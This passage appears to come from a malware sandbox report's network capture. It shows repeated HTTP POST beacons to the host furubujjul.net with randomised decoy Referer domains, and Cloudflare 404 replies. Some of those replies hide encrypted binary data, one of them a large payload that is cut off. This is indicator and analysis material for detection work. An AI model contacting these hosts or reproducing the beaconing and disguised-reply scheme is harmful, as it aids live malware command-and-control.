96 4d cb e7 17 3f dc e5 7e 4d a6 70 d4 03 eb ac 98 76 6e 0f ca 82 cf 25 2e 9f 96 ce ec 35 98 c3 a7 0d a8 ca d4 5f 29 43 43 9c 55 03 62 18 3a 1d f8 40 aa ae 88
                                                                                                                                  Data Ascii: 7d6c`@0,xO}q4 IJ%9Wd8IkDJ8P>%y^\.Kij}S.;vKs6(p_6k)|p|t]ShG*2Y>+([;S#0T[l2`ma *ikZz|fa4wp673P#p"XJ3Ob>!ZC:>YuSSQ*{~xJ$Oa~i~]DzN,z!Qa6<5|(kJk?a]V4l3l)|K~qJO;yLuVW;*r#"g1er+Lc1<'isFHU=hW}U@Wd{9f(B@w=fd3Dw)pKNTUo)2([>T~pWlLj,[}JPmCr[+z(Fzk7 RH:M?~Mpvn%.5_)CCUb:@
                                                                                                                                  Oct 17, 2022 22:06:29.999082088 CEST1065OUTPOST / HTTP/1.1
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                  Accept: */*
                                                                                                                                  Referer: http://gvuhujihq.net/
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                  Content-Length: 139
                                                                                                                                  Host: furubujjul.net
                                                                                                                                  Oct 17, 2022 22:06:30.102993011 CEST1066INHTTP/1.1 404 Not Found
                                                                                                                                  Date: Mon, 17 Oct 2022 20:06:30 GMT
                                                                                                                                  Content-Type: text/html; charset=utf-8
                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                  Connection: keep-alive
                                                                                                                                  CF-Cache-Status: DYNAMIC
                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=2j%2BG0TuBeEb%2B718l4IcNHqvsmb5%2FURQTJ2nlKZ%2BrZIAdPO59uvg1H%2BpCEnm9OYqyqPP8zwBWiwAu8zUiZ33Vjes1yVUcLLfR8ICZuLcJDKHOVKmpZaTP3nUUAf8b3nzzKg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                  Server: cloudflare
                                                                                                                                  CF-RAY: 75bba7b5894a06d1-LHR
                                                                                                                                  alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                                                                                                                                  Data Raw: 31 34 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                  Data Ascii: 147<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
                                                                                                                                  Oct 17, 2022 22:06:30.119431019 CEST1067OUTPOST / HTTP/1.1
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                  Accept: */*
                                                                                                                                  Referer: http://pyqxykfbyx.net/
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                  Content-Length: 334
                                                                                                                                  Host: furubujjul.net
                                                                                                                                  Oct 17, 2022 22:06:30.241849899 CEST1068INHTTP/1.1 404 Not Found
                                                                                                                                  Date: Mon, 17 Oct 2022 20:06:30 GMT
                                                                                                                                  Content-Type: text/html; charset=utf-8
                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                  Connection: keep-alive
                                                                                                                                  CF-Cache-Status: DYNAMIC
                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=%2FnEqIOUVgHkCA6dmPTX8MQA57DvXbCBz%2FkdAkHQGY31oDK%2FwrF38ZS4sSOWnaTH7aezykVmTzii76QS1MbfhqeAg7aj4VO2m%2FGG%2BXBc3fetrR%2BqU%2F2lkC8XPQqhokkbEWg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                  Server: cloudflare
                                                                                                                                  CF-RAY: 75bba7b64a9c06d1-LHR
                                                                                                                                  alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                                                                                                                                  Data Raw: 31 34 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                  Data Ascii: 147<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
                                                                                                                                  Oct 17, 2022 22:06:30.253982067 CEST1069OUTPOST / HTTP/1.1
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                  Accept: */*
                                                                                                                                  Referer: http://egupm.com/
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                  Content-Length: 110
                                                                                                                                  Host: furubujjul.net
                                                                                                                                  Oct 17, 2022 22:06:30.360281944 CEST1070INHTTP/1.1 404 Not Found
                                                                                                                                  Date: Mon, 17 Oct 2022 20:06:30 GMT
                                                                                                                                  Content-Type: text/html; charset=utf-8
                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                  Connection: keep-alive
                                                                                                                                  CF-Cache-Status: DYNAMIC
                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=qv76Zyv3DXqgduqpOT%2Fap6kb0AyM2NyxeEgH7VsxPdEZTPxUekzEzzcATGgBWTP%2FisMnu7pADkRp3bs8HC6Aw2d9m3TDB3endIm4DUQGiJGlz2bmhrK6pYVP2hK6BL3llg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                  Server: cloudflare
                                                                                                                                  CF-RAY: 75bba7b72c0e06d1-LHR
                                                                                                                                  alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                                                                                                                                  Data Raw: 31 34 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                  Data Ascii: 147<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
                                                                                                                                  Oct 17, 2022 22:06:30.375211954 CEST1070OUTPOST / HTTP/1.1
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                  Accept: */*
                                                                                                                                  Referer: http://ypsqcei.com/
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                  Content-Length: 184
                                                                                                                                  Host: furubujjul.net
                                                                                                                                  Oct 17, 2022 22:06:30.475930929 CEST1071INHTTP/1.1 404 Not Found
                                                                                                                                  Date: Mon, 17 Oct 2022 20:06:30 GMT
                                                                                                                                  Content-Type: text/html; charset=utf-8
                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                  Connection: keep-alive
                                                                                                                                  CF-Cache-Status: DYNAMIC
                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=k5zlqtk%2F8xb1LLitUYEq85Pm83C0wQVr8uiIbjT6o%2BKE74AFyy3v5p9p7o5%2BVY9Gg0Kegac6YXfDb7n9q0lWHzholuQ%2FbC7cBYX4zn8%2BYv0Wq%2BUh%2FYvXasQsRzx0h2Hwpw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                  Server: cloudflare
                                                                                                                                  CF-RAY: 75bba7b7ed3706d1-LHR
                                                                                                                                  alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                                                                                                                                  Data Raw: 32 38 0d 0a 00 00 b5 55 08 b5 79 73 2f 7e 28 10 e8 c3 a7 f7 be 60 3a 4c cd 44 9f 05 85 a2 4e f2 7a a6 64 14 0e 63 bf 75 4a 61 94 5d 0d 0a
                                                                                                                                  Data Ascii: 28Uys/~(`:LDNzdcuJa]
                                                                                                                                  Oct 17, 2022 22:06:31.679177046 CEST1302OUTPOST / HTTP/1.1
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                  Accept: */*
                                                                                                                                  Referer: http://gayxc.net/
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                  Content-Length: 340
                                                                                                                                  Host: furubujjul.net
                                                                                                                                  Oct 17, 2022 22:06:31.817365885 CEST1304INHTTP/1.1 404 Not Found
                                                                                                                                  Date: Mon, 17 Oct 2022 20:06:31 GMT
                                                                                                                                  Content-Type: text/html; charset=utf-8
                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                  Connection: keep-alive
                                                                                                                                  CF-Cache-Status: DYNAMIC
                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=s1v%2Bgx4MDe2nngZ9vJhRTJWiek%2BpWKZYyxOm0WJRASi81rbou8GGd%2F%2FeG26tujefQqKwWTxHJaHKHDha6hV1wZ4kH%2FgrGuq4WbkiHZJnCWTbb8WYeo1y3RI7b3EakRPZFA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                  Server: cloudflare
                                                                                                                                  CF-RAY: 75bba7c00a9a06d1-LHR
                                                                                                                                  alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                                                                                                                                  Data Raw: 31 34 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                  Data Ascii: 147<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
                                                                                                                                  Oct 17, 2022 22:06:32.346658945 CEST1304OUTPOST / HTTP/1.1
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                  Accept: */*
                                                                                                                                  Referer: http://jnwjh.org/
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                  Content-Length: 274
                                                                                                                                  Host: furubujjul.net
                                                                                                                                  Oct 17, 2022 22:06:32.456585884 CEST1306INHTTP/1.1 404 Not Found
                                                                                                                                  Date: Mon, 17 Oct 2022 20:06:32 GMT
                                                                                                                                  Content-Type: text/html; charset=utf-8
                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                  Connection: keep-alive
                                                                                                                                  CF-Cache-Status: DYNAMIC
                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=MH4T%2FMqff3N4OrHnnRMlaneafNnafTKCK3Vq2FjF2qz8fObhvZWeTjJTFrlpRqN31PS4KGh4yZIFW66%2FeexijRGYNTk8quehV%2F2jp1MVRy%2Bp4C6R2YVFzPcklcB5Kf12EQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                  Server: cloudflare
                                                                                                                                  CF-RAY: 75bba7c439d906d1-LHR
                                                                                                                                  alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                                                                                                                                  Data Raw: 31 34 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                  Data Ascii: 147<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
                                                                                                                                  Oct 17, 2022 22:06:32.805388927 CEST1306OUTPOST / HTTP/1.1
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                  Accept: */*
                                                                                                                                  Referer: http://kqnukffkf.org/
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                  Content-Length: 162
                                                                                                                                  Host: furubujjul.net
                                                                                                                                  Oct 17, 2022 22:06:32.912211895 CEST1307INHTTP/1.1 404 Not Found
                                                                                                                                  Date: Mon, 17 Oct 2022 20:06:32 GMT
                                                                                                                                  Content-Type: text/html; charset=utf-8
                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                  Connection: keep-alive
                                                                                                                                  CF-Cache-Status: DYNAMIC
                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=B34UVpqEQHKdsJgz9n2w%2FdDIj9mLcQhOn%2FWU9b8g3v8kE4PrQyGsCvL2kSD0gcLFVt2yH%2B9fzTkKoVPpyQ%2BqEhnggeuiw4PcSbsSJ3whOwsqss%2BejPa%2FDoThyuMxZ44Jsw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                  Server: cloudflare
                                                                                                                                  CF-RAY: 75bba7c71f1f06d1-LHR
                                                                                                                                  alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                                                                                                                                  Data Raw: 33 37 0d 0a 00 00 b5 55 08 b5 79 73 2f 7e 28 10 e8 c3 a7 f7 f7 75 3a 52 85 14 dd 51 d5 ff 13 b1 67 f2 25 48 16 22 e0 6a 0b 65 88 17 0a 03 6b de a0 81 8f d0 30 d1 76 64 5d 28 e2 0d 0a
                                                                                                                                  Data Ascii: 37Uys/~(u:RQg%H"jek0vd](
                                                                                                                                  Oct 17, 2022 22:06:37.042898893 CEST1537OUTPOST / HTTP/1.1
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                  Accept: */*
                                                                                                                                  Referer: http://njomtuqes.net/
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                  Content-Length: 202
                                                                                                                                  Host: furubujjul.net
                                                                                                                                  Oct 17, 2022 22:06:37.151626110 CEST1538INHTTP/1.1 404 Not Found
                                                                                                                                  Date: Mon, 17 Oct 2022 20:06:37 GMT
                                                                                                                                  Content-Type: text/html; charset=utf-8
                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                  Connection: keep-alive
                                                                                                                                  CF-Cache-Status: DYNAMIC
                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=65wTixgQCVrdomjCkVKJ7TSMtzbH4CsUGEvFxgg1qB7oZlfR9TRjZFOJc2vP9np%2FMEj35fyeNLOtl3%2BDJr4r0wpKzaovSk9ABB3TZ56N3sxjSIhQbHYJZ5pVYhljLcgM4w%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                  Server: cloudflare
                                                                                                                                  CF-RAY: 75bba7e1997606d1-LHR
                                                                                                                                  alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                                                                                                                                  Data Raw: 31 34 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                  Data Ascii: 147<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
                                                                                                                                  Oct 17, 2022 22:06:37.188725948 CEST1538OUTPOST / HTTP/1.1
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                  Accept: */*
                                                                                                                                  Referer: http://bcubynupij.com/
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                  Content-Length: 143
                                                                                                                                  Host: furubujjul.net
                                                                                                                                  Oct 17, 2022 22:06:37.311263084 CEST1540INHTTP/1.1 404 Not Found
                                                                                                                                  Date: Mon, 17 Oct 2022 20:06:37 GMT
                                                                                                                                  Content-Type: text/html; charset=utf-8
                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                  Connection: keep-alive
                                                                                                                                  CF-Cache-Status: DYNAMIC
                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=yiHLB0muGZOWOS1UV%2FZ6%2FxBSP4kFNUgzgmMPY39sAPx9z06Lh5JuDfHt8%2BH1sbkZVBeIKcBujy5Fs%2FWgtJdkr9xK0Igud8Anyw%2BoJ0pr9fs1Kq0VUydzwS7JmIEv55ID4w%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                  Server: cloudflare
                                                                                                                                  CF-RAY: 75bba7e27ad706d1-LHR
                                                                                                                                  alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                                                                                                                                  Data Raw: 33 38 33 30 0d 0a 00 00 b4 60 fb d4 0e 1a 40 10 16 30 80 b7 2c 78 84 4f ad 7d f5 71 b1 34 b2 96 20 c3 49 91 4a 25 39 57 90 06 64 04 ec 38 49 6b 19 b1 cd e4 dc b5 44 a4 06 4a 38 50 87 d2 d9 c3 3e 08 a2 13 c5 8e e2 e3 07 97 8a 06 9e 8f f1 83 0e 25 a6 79 5e 5c 95 03 0f 2e 0e 4b 69 e1 d9 a0 6a 7d ec 53 2e 3b 76 4b 12 73 36 18 28 a6 70 a3 d1 5f 36 6b 85 29 7c f2 c6 e6 70 95 06 7c 93 74 5d b9 53 68 47 8f 2a f5 00 59 3e b0 19 c6 28 d9 b5 96 d3 15 69 05 0f d6 f2 97 ac f7 97 3b e2 df 61 23 30 54 2d f5 09 16 69 6c 32 60 e0 dd 6d 61 12 2a 85 19 5e f7 6b db 89 b2 07 5a b1 a4 07 0d ab 17 c4 f8 48 7c e1 66 90 cc f8 83 53 34 77 70 36 f8 37 33 62 97 23 f5 ed 05 70 b1 17 22 58 4a 63 0a 62 3e 59 20 08 5a ac 6a 09 5b 56 3f cb 00 23 be 42 15 37 07 50 52 f1 ca 16 9e 1d f9 53 2b e5 d3 94 7b 7e 45 f7 ff 7e 2c 55 db c4 1d 13 13 bf 1e e3 92 24 08 0f c5 03 b1 cb a1 61 7c de f5 6c b9 19 17 7e 5f af 9a a0 44 c9 a0 c1 b9 dd 7a 0d d0 57 19 e0 28 95 a9 38 14 f1 96 bc 25 51 e0 9a d4 2e 7c 88 38 c8 48 6b a1 d0 4a 9a 13 fd ec 9e aa 7b ac 97 2f bd 61 0d c0 5d bf 46 34 fd f8 6e 9f 32 6c 01 7c 0a 8d c7 0d fc 0e 7c a0 7e 71 eb 80 f5 1a 68 9b 4a d8 19 ae cc 4f 3b 79 82 ae 9c 97 02 4c 75 56 ad f3 d7 29 2a b9 6e ee cc 23 b2 75 0e 31 79 92 90 f7 df f5 ec e7 72 2b 4c 80 d0 12 f9 13 63 11 bb d6 9f 08 3c 27 94 69 b7 9f 33 c9 cc 46 d9 48 15 ac af fb d9 55 21 ad ba 68 92 0e ff 9d 7f 7f 55 40 57 64 7b 39 66 e7 ac 04 28 84 42 40 77 9b c7 9b aa 93 58 1e 85 8a 64 b1 ad df 13 51 8c 60 17 4b 81 9b de 8e 82 05 e8 e4 1f 5e a1 90 4e a1 54 55 a5 8e b7 1b 4f c3 cb 49 1c 4c 86 2f 7f 54 ab 1e e6 9e 07 ee c3 ce 55 a3 4c 37 84 1f d4 a8 69 91 9c 29 06 f1 2c 5e ae 03 5b e5 1f e4 e6 7d 10 5f 3e cb aa c2 fa 07 99 8a 15 af 7f 74 79 a0 75 43 cc f5 8b 8b e1 7c 79 d7 9c 88 c3 e0 2b a9 